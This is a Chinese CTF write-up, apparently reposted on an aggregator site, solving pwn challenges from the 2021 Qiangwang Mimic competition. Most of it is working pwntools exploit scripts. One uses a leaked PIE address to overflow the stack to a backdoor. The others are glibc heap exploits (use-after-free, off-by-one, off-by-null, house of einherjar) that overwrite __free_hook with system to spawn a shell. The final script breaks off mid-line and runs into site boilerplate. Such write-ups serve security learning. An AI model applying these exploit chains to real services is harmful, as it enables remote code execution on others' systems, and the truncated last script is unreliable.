2021强网拟态复现
Posted Y0n1an
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021强网拟态复现相关的知识,希望对你有一定的参考价值。
INDEX
sonic
checksec一下
发现开了PIE和NX还有relro,这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了
程序打印出了main的地址,开PIE后三位不变,所以打印出main地址后直接取除了后三位的其他位,在ida找后三位地址加上就行,然后就可以栈溢出getshell
from pwn import *
#r=remote('123.60.63.90',6890)
r = process('./sonic')
context(arch='amd64', os='linux')
r.recvuntil('main Address=0x')
main_addr = int(r.recv(12),16)
elf_base=main_addr-0x7CF
print hex(elf_base)
ret_addr=elf_base+0x8C4
backdoor=elf_base+0x73A
r.sendlineafter('login:',p64(0)*5+p64(ret_addr)+p64(backdoor))
r.interactive()
~
pwnpwn
栈溢出,给了canary,白给
random_heap
分配随机堆的大小
改写函数未见off by null和堆溢出
delete函数有uaf
那可以改fd为free_hook申请回来就可以改free_hook为后门了
from pwn import *
#r=remote('124.71.140.198',49153)
r = process('./random_heap')
libc=ELF('libc-2.27.so')
context(arch='amd64', os='linux')
context.log_level='debug'
def add(idx,size):
r.sendlineafter('Your choice: ','1')
r.sendlineafter('Index: ',str(idx))
r.sendlineafter('Size: ',str(size))
def edit(idx,con):
r.sendlineafter('Your choice: ','2')
r.sendlineafter('Index: ',str(idx))
r.sendafter('Content: ',con)
def show(idx):
r.sendlineafter('Your choice: ','3')
r.sendlineafter('Index: ',str(idx))
def delete(idx):
r.sendlineafter('Your choice: ','4')
r.sendlineafter('Index: ',str(idx))
add(0,0x100)
add(1,0x10)
for i in range(8):
edit(0,0x10*'\\x00')
delete(0)
show(0)
libc.address=u64(r.recvuntil('\\x7f')[-6:].ljust(8,'\\x00'))-96-0x10-libc.sym['__malloc_hook']
add(2,0x20)
delete(2)
edit(2,p64(libc.sym['__free_hook'])+p64(0)+'\\n')
while True:
try:
add(3,0x10)
add(4,0x10)
edit(4,p64(libc.sym['system'])+'\\n')
edit(3,'/bin/sh\\x00'+'\\n')
delete(3)
delete(4)
except:
r.interactive()
bitflip
alloc函数
edit函数中有off by one的漏洞
delete函数没有UAF
思路:shrink the chunk,unsorted bin泄露libc基址然后打free_hook
from pwn import *
r=process('./bitflip')
libc=ELF('libc-2.27.so')
context(arch='amd64', os='linux')
context.log_level='debug'
def add(idx,size):
r.sendlineafter('Your choice: ','1')
r.sendlineafter('Index: ',str(idx))
r.sendlineafter('Size: ',str(size))
def edit(idx,con):
r.sendlineafter('Your choice: ','2')
r.sendlineafter('Index: ',str(idx))
r.sendlineafter('Content: ',con)
def show(idx):
r.sendlineafter('Your choice: ','3')
r.sendlineafter('Index: ',str(idx))
def free(idx):
r.sendlineafter('Your choice: ','4')
r.sendlineafter('Index: ',str(idx))
for i in range(12):
add(i,0x38)
for i in range(8):
edit(i,0x38*'a'+'\\xc1')
for i in range(8):
free(i+1)
add(12,0x38)# cut from unsorted bin
show(9)
libc.address=u64(r.recvuntil('\\x7f')[-6:].ljust(8,'\\x00'))-96-0x10-libc.sym['__malloc_hook']
print hex(libc.address)
add(13,0x38)# cut from unsorted bin
free(13)#chunk13 is chunk9
edit(9,p64(libc.sym['__free_hook']))
add(14,0x38)#chunk13
add(15,0x38)#chunk9
edit(15,p64(libc.sym['system']))# change free_hook to system
edit(14,'/bin/sh\\x00')
free(14)
r.interactive()
old_school
保护全开,不多说
off by one
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
sh = process('./old_school')
libc = ELF('./libc-2.27.so')
#sh = remote('121.36.194.21', 49153)
def add(index, size):
sh.sendlineafter('Your choice: ', '1')
sh.sendlineafter('Index: ', str(index).encode())
sh.sendlineafter('Size: ', str(size).encode())
def edit(index, content):
sh.sendlineafter('Your choice: ', '2')
sh.sendlineafter('Index: ', str(index).encode())
sh.sendlineafter('Content: ', content)
def show(index):
sh.sendlineafter('Your choice: ', '3')
sh.sendlineafter('Index: ', str(index).encode())
def delete(index):
sh.sendlineafter('Your choice: ', '4')
sh.sendlineafter('Index: ', str(index).encode())
for i in range(2):
add(i,0x18)
add(2,0x80)
for i in range(5):
add(i+3,0x100)
edit(0,'a'*0x18+p8(0xf1))
delete(1)#overwrite the size of chunk1 to 0xf1
#then chunk1 overlap chunk2 and partial chunk3
add(8,0xe0)#chunk1 0xf1 size
edit(8,'b'*0x18+p64(0x4d1))#edit chunk2 size
delete(2)
add(9,0x100)#cuting from unsorted bin chunk2
show(9)
sh.recvuntil(b'Content: ')
libc_addr = u64(sh.recvn(6) + '\\x00\\x00') - 96-0x10-libc.symbols['__malloc_hook']
print hex(libc_addr)
delete(3)#free 0x100 chunk3
edit(9,'c'*0x80+p64(0)+p64(0x111)+p64(libc_addr+libc.symbols['__free_hook']))#chunk2 size:0x80
add(10, 0x100)#chunk3
add(11, 0x100)#free_hook
edit(11, b'/bin/sh\\0' + p64(libc_addr + libc.symbols['system']))
delete(11)
sh.interactive()
#gdb.attach(sh)
#pause()
old_school_revenge
还是保护全开的
edit里面有个off by null
house of einherjar构成堆叠覆盖到之前free的tcache 0x100的chunk
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
r = process('./old_school_revenge')
libc = ELF('./libc-2.27.so')
def add(index, size):
r.sendlineafter('Your choice: ', '1')
r.sendlineafter('Index: ', str(index).encode())
r.sendlineafter('Size: ', str(size).encode())
def edit(index, content):
r.sendlineafter('Your choice: ', '2')
r.sendlineafter('Index: ', str(index).encode())
r.sendlineafter('Content: ', content)
def show(index):
r.sendlineafter('Your choice: ', '3')
r.sendlineafter('Index: ', str(index).encode())
def delete(index):
r.sendlineafter('Your choice: ', '4')
r.sendlineafter('Index: ', str(index).encode())
add(0,0xf8)
add(1, 0xf8)
delete(0)
delete(1)
add(1, 0xf8)
show(1)
r.recvuntil('Content: ')#show heap addr by using fd pointer
heap_addr = u64(r.recvn(6)+'\\x00\\x00') - 0x260
print hex(heap_addr)
add(0, 0xf8)
for i in range(8):
add(i+2, 0xf8)# from chunk2 to chunk9
for i in range(5):
delete(i+2)# delete chunk2 to chunk6
edit(7, 'a' * 0xf0 + p64(0x7f0))#overwrite prev_size
edit(0, p64(0) + p64(0x7f0) + p64(heap_addr + 0x260) + p64(heap_addr + 0x260))#bypass p->fd = p->bk
delete(7)
delete(1)
delete(8)
add(1, 0xe0)# In this step overlap
add(2, 0xe0)# leave main_arena+96
show(2)
r.recvuntil('Content: ')
libc_addr = u64(r.recvn(6) + '\\x00\\x00') - 96-0x10-libc.sym['__malloc_hook']
print hex(libc_addr)
edit(2,p64(libc_addr+libc.sym['__free_hook']))#the chunk2 is the chunk1 with 0x100 size that we free last
add(3,0xf8)#chunk2
add(4,0xf8)#free_hook
edit(4, b'/bin/sh\\0' + p64(libc_addr + libc.sym['system']))
delete(4)
r.interactive()
#gdb.attach(r)
#pause()
bornote
patch掉jmp rax前一条db为nop
这样可以看到里面的函数了
2.31下的off by null
from pwn import *
import random
context.arch = 'amd64'
context.log_level = 'debug'
sh = process('./bornote')
libc = ELF('./libc-2.31.so')
#sh = remote('121.36.250.162', 49153)
def add(size):
sh.sendlineafter('s cmd: ', '1')
sh.sendlineafter(b'Size: ', str(size).encode())
def edit(index, content):
sh.sendlineafter('s cmd: ', '3')
sh.sendlineafter(b'Index: ', str(index).encode())
sh.sendafter(b'Note: ', content)
def show(index):
sh.sendlineafter('s cmd: ', '4')
sh.sendlineafter('Index: ', str(index).encode())
def delete(index):
sh.sendlineafter('s cmd: ', '2')
sh.sendlineafter('Index: ', str(index).encode())
sh.sendlineafter('username: ','glibc2.31')
add(0x18)#0
add(0x18)#1
delete(0)
delete(1)
add(0x18)#chunk1 brefore but now it's index is 0
show(0)
sh.recvuntil('Note: ')
heap_addr = u64(sh.recvn(6) + '\\x00\\x00')
print hex(heap_addr)
add(0xf8)#1
add(0x28)#2
add(0x4f8)#3
add(0x38)#4
edit(2,'a'*0x20+p64(0x120))
edit(1,p64(0)+p64(0x121)+p64(heap_addr+0x40)+p64(heap_addr+0x40)+'\\n')
delete(3)
add(0x200)# cuting from chunk3 now it's chunk3
show(3)
sh.recvuntil('Note: ')
libc_addr = u64(sh.recvn(6) + '\\0\\0')- 96-0x10-libc.sym['__malloc_hook']
print hex(libc_addr)
add(0x28以上是关于2021强网拟态复现的主要内容,如果未能解决你的问题,请参考以下文章
[Writeup]2021强网拟态 Give_me_your_0day